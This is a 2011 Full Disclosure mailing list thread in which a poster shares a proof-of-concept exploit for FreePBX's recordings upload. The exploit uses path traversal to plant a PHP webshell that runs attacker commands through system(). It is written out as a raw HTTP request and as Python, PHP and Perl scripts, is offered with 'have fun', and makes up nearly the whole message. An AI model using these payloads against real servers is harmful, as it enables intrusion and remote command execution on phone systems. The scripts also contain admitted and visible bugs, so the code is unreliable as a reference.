
Also, please look into this seperate PoC for freepbx, as it apparently is
working, altho , i do not TRY to make peoples websites screwed etc,i am
happy to do a Poc but, i dont run local webserver at moment, am in the midst
of changing raqs over.. I am just after some help in regards to this.
Cheers,
xd / dru

On 10 June 2011 09:08, -= Glowing Doom =- <secn3t [at] gmail> wrote:

> ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke
> and should have looked... just look at part1 and part2 :) it is pretty
> simple to fix...
>
> also when uploading, you create your own /folder/ , using this method
> anyhow..
>
>
>
> On 10 June 2011 08:59, -= Glowing Doom =- <secn3t [at] gmail> wrote:
>
>> Hello...
>> I wrote a PoC code, for similar bug in this application, about 3months
>> ago... unfortunately, i did not bother to put it on here because well, it
>> was nothing much.. but since this 'admin' module has appeared, i will add my
>> codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
>> module is needed..it seems to ONLY look for the recordings... anyhow have
>> fun.. admin i believe :)... nice try to find the sploit guys, i have only
>> posted it on my blogs and pastebin about 400times in the past 4months... i
>> guess i will put it here next time.. here is some codes for you..:
>> -------------------------------------------------------------------------------------------------------
>> PoC
>> The HTTP request below illustrates the upload of a phpshell::
>>
>> POST /admin/config.php HTTP/1.1
>> Host: 10.10.1.3
>> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
>> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> Accept-Language: en-us,en;q=0.5
>> Accept-Encoding: gzip,deflate
>> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>> Keep-Alive: 300
>> Proxy-Connection: keep-alive
>> Referer: http://10.10.1.3/admin/config.php
>> Cookie: ARI=cookieValue; PHPSESSID=cookieValue
>> Authorization: Basic base64auth
>> Content-Type: multipart/form-data;
>> boundary=---------------------------5991806838789183981588991120
>> Content-Length: 116089
>>
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="display"
>>
>> recordings
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="action"
>>
>> recordings_start
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="usersnum"
>>
>> ../../../../../var/www/html/admin/SpiderLabs
>> -----------------------------5991806838789183981588991120
>> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
>> Content-Type: application/octet-stream
>> <?php
>> /* WebShell code goes here */
>> ?>
>> -----------------------------5991806838789183981588991120--
>>
>> OK SO...
>>
>> In python form:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---------------------------5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---------------------------5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-----------------------------5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
>> '-----------------------------5991806838789183981588991120--\r\n'
>>
>> and...
>>
>> IN php:
>>
>> <?php
>> echo "\n\n";
>> echo
>> "+-------------------------------------------------------------------------+\r\n";
>> echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n";
>> echo "| Usage: php exploit.php site.com
>> |\r\n";
>> echo
>> "+-------------------------------------------------------------------------+\r\n";
>> echo "\n";
>> echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
>> $code = trim(fgets(STDIN));
>> $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
>> if(!$socket) {
>> die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
>> }
>> $part1 = "POST /admin/config.php HTTP/1.1\r\n";
>> $part1 .= "Host: " . $argv[1] . "\r\n";
>> $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
>> 10.4.6)\r\n";
>> $part1 .= "Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
>> $part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
>> $part1 .= "Accept-Encoding: gzip,deflate\r\n";
>> $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
>> $part1 .= "Connection: keep-alive\r\n";
>> $part1 .= "Keep-Alive: 300\r\n";
>> $part1 .= "Proxy-Connection: keep-alive\r\n";
>> $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";
>> $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
>> $part1 .= "Authorization: Basic base64auth\r\n";
>> $part1 .= "Content-Type : multipart/form-data;\r\n";
>> $part2 =
>> "boundary=-----------------------------5991806838789183981588991120--\r\n";
>> $part1 .= "Content-Type : multipart/form-data;\r\n";
>> $part2 =
>> "boundary=-----------------------------5991806838789183981588991120--\r\n";
>> $part2 = "Content-Length: 116089\r\n";
>> $part2 .= "\r\n";
>> $part2 .=
>> "-----------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"display\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "recordings\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "recordings_start\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"usersnum\"\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "Content-Disposition: form-data;
>> name=\"../../../../../var/www/html/admin/xd\"\r\n";
>> $part2 .=
>> "---------------------------5991806838789183981588991120\r\n";
>> $part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
>> filename=\"shell.php\"\r\n";
>> $part2 .= "Content-Type: application/octet-stream\r\n";
>> $part2 .= "\r\n";
>> $part2 .= "<?php echo \'<pre>\' + system(\'$code\') +
>> \'</pre>\'; ?>\r\n";
>> $part2 .=
>> "-----------------------------5991806838789183981588991120--\r\n";
>> $part1 .= $part2;
>> fwrite($socket, $part1);
>> echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
>> } else {
>> echo "\n\n";
>> echo "+---------------------------------------------------+\r\n";
>> echo "| Usage: php exploit.php site.com |\r\n";
>> echo "+---------------------------------------------------+\r\n";
>> echo "\n\n";
>> }
>> ?>
>>
>> and in perl..
>>
>> #!/usr/bin/perl
>> use IO::Socket::INET;
>> use Crypt::SSLeay;
>> use Net::SSL;
>>
>> sub usage {
>> print "perl $0 <Host> <Cmd>\n";
>> exit(1);
>> }
>> my($host, $cmd) = @ARGV or usage();
>> print "[+] Connecting to host...\n";
>> my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
>> => 80,Timeout => 10) or die "[-] Connect error..\n";
>> if(!sock) {
>> print "[-] Non-SSL PBX NOT HERE!\n";
>> exit(-1);
>> else {
>> $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
>> 443,Timeout => 10) or die "[-] Connect error..\n";
>> print "[-] SSL PBX NOT HERE!\n";
>> exit(-1);
>> }
>> print "[+] Connected.. Sending Buffer\n";
>> my $temp=
>> "POST /admin/config.php HTTP/1.1\n".
>> "Host: $host:80/\n".
>> "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
>> "Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
>> "Accept-Language: en-us,en;q=0.5\n".
>> "Accept-Encoding: gzip,deflate\n".
>> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
>> "Keep-Alive: 300\n".
>> "Proxy-Connection: keep-alive\n".
>> "Referer: http://$host/admin/config.php\n".
>> "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
>> "Authorization: Basic base64auth\n".
>> "Connection: keep-alive\n".
>> "Content-Type : multipart/form-data;\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Length: 116089\n".
>> "\n".
>> "Content-Disposition: form-data; name=\"display\"\n".
>> "recordings\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data; name=\"action\"\n".
>> "recordings_start\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data; name=\"usersnum\"\n".
>> "\n".
>> "---------------------------5991806838789183981588991120\n".
>> "Content-Disposition: form-data;
>> name=\"../../../../../var/www/html/admin/xd\"\n".
>> "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
>> "Content-Type: application/octet-stream\n".
>> "\n".
>> "<?php ". $cmd ." ?>\n".
>> "-----------------------------5991806838789183981588991120--\n\n";
>>
>> print "[+] Sent file 'shell.php' to act as webshell ..\n";
>> my $buffer_size=length($temp);
>> $temp;
>> my $answer=0;
>> $buffer=~s/siz/$buffer_size/g;
>> print $sock $buffer;
>> if ($sock) {
>> print "[+] Buffer sent..running command: $cmd ..\n";
>> while ($answer=<$sock>) {
>> print $answer;
>> print results "[!] Server reply: $answer ..\n";
>> }
>> }
>> }
>>
>> have fun! Perl one is abit rough..
>> dru
>>
>> xd @ #haxNET @ Efnet
>>
>> (National LULZ day is here!)
>>
>> And for those guys who 'exploited' it... this PoC was released like
>> 3months ago... what the hell are yu guiys on about, and where is even a
>> HEADER showing explotation :S seems you have started a group but forgot to
>> check this for previous bugs :) hehe... nomatter, it is now debugged for
>> you.
>>
>>
>

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.